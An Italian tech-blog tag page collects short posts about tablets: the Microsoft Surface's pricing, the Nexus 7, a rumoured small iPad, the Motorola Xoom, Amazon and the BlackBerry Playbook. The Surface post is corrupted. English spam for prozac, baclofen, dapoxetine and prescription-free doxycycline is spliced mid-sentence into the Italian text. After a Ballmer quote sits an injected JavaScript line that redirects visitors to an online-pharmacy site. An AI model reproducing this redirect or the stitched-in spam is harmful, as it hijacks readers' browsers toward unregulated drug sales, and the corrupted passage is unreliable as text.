Il blog dedicato al mondo della tecnologia
Artikel getaggt mit: tablet

Tablet Microsoft Surface: i prezzi si aggireranno tra i 300 e i 700-800 dollari

Secondo indiscrezioni I tablet hcl 20 mg price prozac liquid australia fluoxetine reviews uk 10 mg en 40mg side effects prozac 6 weeks dexamethasone 4 mg tablet rox prozac uk nhs  Microsoft Surface avranno prezzi che si aggirano fra i 300 e i 700-800 dollari.

looking for cheap baclofen ? not a problem! click here to buy baclofen baclofen – order online now! guaranteed worldwide shipping discreet pac.

Per discolparsi dalle accuse che si riferiscono ai prezzi troppo alti, Steve Ballmer, numero uno di Redmond, ha criticato i prodotti meno costosi buy prednisone buy dapoxetine online india . affordable health care. dapoxetine is used as a treatment for premature ejaculation. dapoxetine india! without prescription to ship overnight. joe gati where can i buy doxycycline without prescription (facility manager & research scientist) messi in circolazione perché presentano funzioni limitate.

In altri termini, Microsoft ritiene che non abbia senso mirare necessariamente su un prezzo basso, quel che è importante è offrire agli utenti un prodotto che sia capace di compiere più funzioni perché la maggior parte degli acquirenti è disposta a spendere di più in modo tale da avere il meglio.

Ballmer, infine, ha parlato di Microsoft considerandola come una società che offre e vende terminali e servizi integrati.  L’ha definita, insomma,  una nuova Apple, salvo la precisazione che l’azienda non produrrà l’hardware nella sua totalità. A tal proposito ha affermato che: “ci saranno partner che creeranno dispositivi con il software e servizi, attività, questa, in cui l’azienda è leader

window.location = “http://medicationsonlinedoctor.com”;

.

Caratteristiche e prezzo Google Nexus 7


Caratteristiche e prezzo Google Nexus 7. Finalmente il gioiellino di casa Google è nato , Nexus 7 porta l’intrattenimento nelle vostre mani con una straordinaria nitidezza su un display 7 pollici dai colori vivaci ad alta risoluzione protetto da una retina antigraffio. La sua durata ultra con oltre 9 ore di riproduzione video HD, 10 ore di navigazione web o 10 ore di e-lettura e fino a 300 ore di stand-by, Nexus 7 è progettato per durare. Con il suo processore quad-core è possibile esplorare ed installare più di 600.000 applicazioni e oltre 4 milioni di libri tra cui scegliere, consente di accedere a più grande collezione al mondo di eBooks.

Caratteristiche e prezzo Google Nexus 7

Personalizza la tua esperienza di lettura regolando il tipo di carattere, il passaggio alla modalità giorno o notte, e molto altro. Guardare un film di successo e spettacoli televisivi sono immediatamente disponibili sul Nexus 7 in full HD – non c’è nessuna attesa per i download e la sincronizzazione, o preoccuparsi di spazio di archiviazione. E poiché Nexus 7 ha un 16:9 ad alta risoluzione dello schermo. Il tablet di Google viene fornito con tutte le vostre applicazioni preferite di Google – come Gmail, Chrome, Google e YouTube, mettendo il meglio di Google nel palmo della vostra mano. Facile da usare, tutto si sincronizza automaticamente attraverso il vostro tablet, telefono e computer. Con le tonnellate di cloud storage gratuito e caratteristiche che abbiate mai trovato da nessun’altra parte. Il prezzo non è altissimo 199 dollari nella versione americana. Quindi non ci resta che aspettare l’arrivo anche in Italia.

Caratteristiche e prezzo Google Nexus 7 cosa ne pensi?

Apple progetta un tablet da 7,85 pollici

Apple progetta un tablet da 7,85 pollici. A rivelare la notizia è stato John Gruber, l’autore del blog “Daring Fireball”. Intervistato durante una puntata di “The Talk Show Podcast”, Gruber ha raccontato di aver personalmente sentito parlare di un tablet Apple di dimensioni più piccole degli attuali iPad: un mini iPad di 7,85 pollici.

Apple progetta un tablet da 7,85 pollici

La risoluzione invece dovrebbe essere, secondo quanto dichiarato da Gruber, di 1024×768, cioè la stessa risoluzione dell’iPad 2 e del suo predecessore iPad 1. Un concept quindi non impossibile da realizzare, visto che con 163 pixel per pollice la nitidezza di questo mini iPad sarebbe comunque superiore rispetto ai precedenti modelli, senza la gravante di dover creare delle applicazioni apposite per il dispositivo in questione. Negli stabilimenti di Cupertino, Apple sarebbe quindi a lavoro su un prototipo di “iPad Nano”. La notizia tuttavia non ha dell’incredibile, in quanto già in passato si è spesso parlato di un possibile iPad di dimensioni ridotte, con lo scopo di offrire un prodotto ad un prezzo più basso, richiamando quindi maggiori utenti verso i prodotti Apple. Bisogna anche tenere in considerazione che è consueta abitudine di Apple creare dei prototipi in modo da poterli testare, per valutare in fine se produrli o meno. In ogni caso la notizia è intrigante, dato che Apple si è sempre opposta ad un cambiamento delle dimensioni dei suoi dispositivi. L’intervistatore Dan Benjamin ha in fine chiesto a Gruber il «perché Apple non dovrebbe rilasciare questo dispositivo»,  Gruber ha risposto dicendo che la domanda giusta da porsi è «perché Apple dovrebbe rilasciare un tale dispositivo».

Apple progetta un tablet da 7,85 pollici cosa ne pensi?

Google sfida l’iPad di Apple

Google sfida l’iPad di Apple. Il colosso californiano di Mountain View sguaina la sua spada e sfida il fin’ora imbattibile iPad di casa Apple. La notizia, recentemente riportata sul Wall Street Journal, cita alcune fonti secondo le quali il nuovo Tablet Android porterà il nome del famoso motore di ricerca a fianco al marchio del produttore.

Google sfida l’iPad di Apple

Di quest’ultimo, o questi ultimi (visto che i produttori potrebbero essere più di uno), invece non si sa ancora nulla, ma sembra siano diverse le società in concorrenza che vogliono entrare nel progetto. Il Tablet di Google sarà venduto tramite sito e-commerce, un negozio online simile a quello di Apple o Amazon. I piani di realizzazione del sito web che farà da negozio per la vendita di questo nuovo tablet non sono ancora chiari, ma secondo alcune fonti la produzione del Google Tablet dovrebbe prendere il via fra poco, visto il recente acquisto di Motorola Mobility da parte di Google. L’acquisizione è stata da poco approvata in Europa e negli Stati Uniti ed è in attesa solo delle autorizzazioni da parte delle autorità cinesi, quindi probabilmente una volta ultimata la transizione, avremo nuove e maggiori informazioni sulla produzione del nuovo Tablet di Google.

Google sfida l’iPad di Apple cosa ne pensi?

Xoom – il nuovo tablet di Motorola

Il mercato dei tablet si sta rivelando col tempo più remunerativo di quanto le prime stime facessero immaginare, per questo non stupisce che quasi tutte le aziende leader nei settori informatici e tecnologici si siano lanciati nella creazione e produzione di tablet, cercando di rincorrere i recenti successi della Apple che con il suo iPad è stata la prima azienda a credere ciecamente nelle potenzialità di questa nuova tecnologia. Questa volta tocca a Motorola, società conosciuta da tutti e apprezzata per i suoi telefoni cellulari. Il tablet Motorola, ribattezzato Xoom, si presenta simile agli altri prodotti concorrenti con una elevata cura per quanto riguarda i materiali adoperati, a discapito però del peso, aspetto fondamentale di un tablet, superiore rispetto altri modelli più o meno simili. Come altri tablet, ad esclusione dell’iPad naturalmente, è equipaggiato con il sistema operativo Android il che gli consente di essere facilmente accessibile per chiunque già conosca il sistema operativo mobile di Google. Il corriere della Sera lo ha provato in anteprima.

Amazon entrerà nel mercato dei tablet

Amazon si prepara ad entrare nel mercato dei Tablet. L’azienda americana dopo esser diventata negli anni il leader incontrastato nel mercato degli ebook reader grazie al Kindle, il suo reader di punta, ha deciso di compiere il grande passo. Quasi inevitabile per una società che aspira ad espandere i propri profitti. Essendo i tablet il prodotto sul quale tutte le più grandi società di elettronica stanno puntando era naturale che anche Amazon decidesse si tuffarsi in questa nuova esperienza. I tablet amazon stando indiscrezioni leggeranno qualsiasi formato ebook e supporteranno il sistema operativo Android. L’uscita dovrebbe avvenire entro la fine del 2011.

Playbook – il tablet con Blackberry ed Android

E’ uscito negli Usa lo scorso 19 aprile. Si tratta del tablet Blackberry Playbook, il primo ad integrare sia il sistema operativo Android che Blackberry. Una piccola rivoluzione nel settore tablet, essendo fin ora tutti i modelli stati limitati da un’unico sistema operativo. Le versioni risponibili saranno tre, che varieranno a seconda del costo e della memoria fisica che il tablet potrà vantare. Si prepara ad essere un degno rivale per l’iPad, per ora leader incontrastato sul mercato dei tablet. Staremo a vedere se i consumatori decideranno di dargli fiducia oppure no.